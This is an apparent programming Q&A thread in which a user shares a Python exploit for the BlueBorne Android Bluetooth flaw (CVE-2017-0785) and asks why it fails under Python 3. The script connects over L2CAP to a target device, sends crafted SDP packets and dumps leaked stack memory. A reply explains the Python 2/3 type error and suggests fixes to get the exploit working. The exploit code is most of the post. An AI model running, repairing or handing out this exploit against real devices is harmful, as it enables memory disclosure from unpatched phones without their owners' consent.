# blueborne exploit for bluetooth android issue

Tags: android, python-3.x

guys I have recently started working on a 4year old exploit about Bluetooth in python.

here is the script:

```py
from pwn import *

import bluetooth


if not 'TARGET' in args:
    log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX")
    exit()


target = args['TARGET']
service_long = 0x0100
service_short = 0x0001
mtu = 50
n = 30


def packet(service, continuation_state):
    pkt = '\x02\x00\x00'
    pkt += p16('7' + len(continuation_state))
    pkt += '\x35\x03\x19'
    pkt += p16(service)
    pkt += '\x01\x00'
    pkt += continuation_state
    return pkt


p = log.progress('Exploit')
p.status('Creating L2CAP socket')

sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bluetooth.set_l2cap_mtu(sock, mtu)
context.endian = 'big'

p.status('Connecting to target')
sock.connect((target, 1))

p.status('Sending packet 0')
sock.send(packet(service_long, '\x00'))
data = sock.recv(mtu)

if data[-3] != '\x02':
    log.error('Invalid continuation state received.')

stack = ''

for i in range(1, n):
    p.status('Sending packet %d' % i)
    sock.send(packet(service_short, data[-3:]))
    data = sock.recv(mtu)
    stack += data[9:-3]

sock.close()
p.success('Done')

print(hexdump(stack))
```

and the error i am getting:

```
Traceback (most recent call last):
  File "/home/ap/Desktop/CVE-2017-0785/CVE-2017-0785.py", line 34, in <module>
    sock.send(packet(service_long, '\x00'))
  File "/home/ap/Desktop/CVE-2017-0785/CVE-2017-0785.py", line 16, in packet
    pkt += p16('7' + len(continuation_state))
TypeError: can only concatenate str (not "int") to str
```

anyone sees any obvious mistakes or something I can alter or extend to make it work? thank you.

Comment: Hard to say, since you haven't told us what your are trying to do!  Please edit your question to show a minimal reproducible set consisting of sample input, expected output, actual output, and only the relevant code necessary to reproduce the problem.  See [Minimal Reproducible Example](https://stackoverflow.com/help/minimal-reproducible-example "Minimal Reproducible Example") for details on how to best help us help you.

Answer (score 1):

same issue here...

Reason for error is conflict version of python.
Script is written in python2...running it in a python3 env. will throw an casting error. (Line 16 and 18) in the "packet" function....p16(...)

Make sure you run the script in a PYTHON 2 enviroment

If you are in python3, try cast to string .....
"str(p16(.....))...
You can also try an rewrite the script in python3.....
Good Luck